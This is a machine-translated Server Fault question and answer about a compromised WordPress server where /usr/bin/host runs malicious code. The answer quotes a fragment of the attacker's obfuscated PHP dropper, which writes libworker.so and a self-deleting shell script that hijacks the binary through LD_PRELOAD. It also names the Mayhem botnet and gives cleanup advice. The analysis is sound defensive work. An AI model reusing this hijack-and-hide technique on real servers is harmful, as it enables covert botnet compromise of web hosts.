ハッキングされたPHPスクリプトによって実行される/ usr / bin / host

8

今日、Apache Webサーバーでの異常に高いリクエスト率と、非常に高い受信ネットワークトラフィックに気づきました。Apacheのmod_statusページを確認したところ、問題のURLがpathからのものであることがわかりましたwww.server.com/www/wp-includes/js/tinymce/plugins/wpautoresize/。実際、ハッキングされた(難読化された)PHPスクリプトがいくつか見つかりました。

www-dataユーザーによって実行された奇妙なプロセスにも気づきました:

www-data  7300 10.8  0.1 2122900 18768 ?       Ssl  Jul11 121:47 /usr/bin/host

チェックすると/proc/7300/cmdline、確かにこれが元の/usr/bin/hostバイナリであることがわかりました。netstat -anp多くのHTTP接続が開かれていることを示したので、どういうわけかそのバイナリは悪用されています。debsumsバイナリチェックサムに問題がないことを確認しました。プロセスがwww-dataユーザーの下で実行されたため、サーバー自体が侵害されたと信じる理由がありませんでした。

そのバイナリはどのように悪用されますか?

編集:これは「侵害されたサーバーに対処する方法」という幅広い質問ではありません。この特定のケースはそれがどのように機能するかで非常に創造的であるため、1つの特定のタイプの乱用についての質問(およびすでに回答)ではなく、技術的にどのように行われますか。これは数年前から問題になっているようで(2012年の古いスレッドと質問)、今週私が遭遇しました。

php  bind  abuse 
Marki555
ソース
関連する質問が終了したので、新しい質問を開いて自分の調査結果を回答しました。serverfault.com/questions/554801/...
Marki555
ワード-モニカの回復

回答:

10

気分を害したPHPスクリプトのソースコードを調べてグーグル(このスレッド)した後、説明を見つけました。

これはsystem.php私が見つけたコードの一部です:

<?php
// ...
$n = file_put_contents("./libworker.so", $so);
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$HBN=basename("/usr/bin/host");
$SCP=getcwd();
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
// ...

/usr/bin/host関与する方法は少し高度です。プログラムは.so、一部の機能にライブラリー(ファイル)を使用します。ユーザーはLD_PRELOAD、正当なバイナリを起動する前に、いくつかの.soファイルをプレリンク()して、その動作方法を変更できます。

ご覧のとおり、このスクリプトはファイルlibworker.soを作成し、LD_PRELOAD環境変数を使用してそれをプリロードしているため、正当なhostバイナリはまったく別のことをしています。

1.shシェルスクリプトを作成し、それをいくつかの方法で(直接、atコマンドを使用して、cronを使用して)実行しようとします。その後すぐに、スクリプトとライブラリファイルがディスクから削除されるため、通知されなくなります。

そもそも何が起こったかというと、脆弱なWordpressプラグインが悪用され、攻撃者がファイルをword-writabbleディレクトリに置くことができました。

緩和とは、そのドメインの古いアクセスログファイルを分析POSTし、異常な場所へのリクエストを見つけようとすることです。たとえば、WP / JoomlaプラグインのPHPファイルに直接アクセスすることは異常です。次に、見つかった難読化されたすべてのPHPファイルを削除し、ディレクトリのアクセス許可を修正し、実行中のhostプロセスを終了し、ログファイルを監視して、再ハッキングの試みがないか確認します。

編集:私はESETから、この特定のライブラリと他のバージョンもすでに検出しているという情報を持っています。アンチウイルス会社はそれをループル名付けメイヘムボットネットの一部として使用されているようです。

Mayhemボットネットの詳細な分析

このエクスプロイトの詳細な分析

Marki555
ソース
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.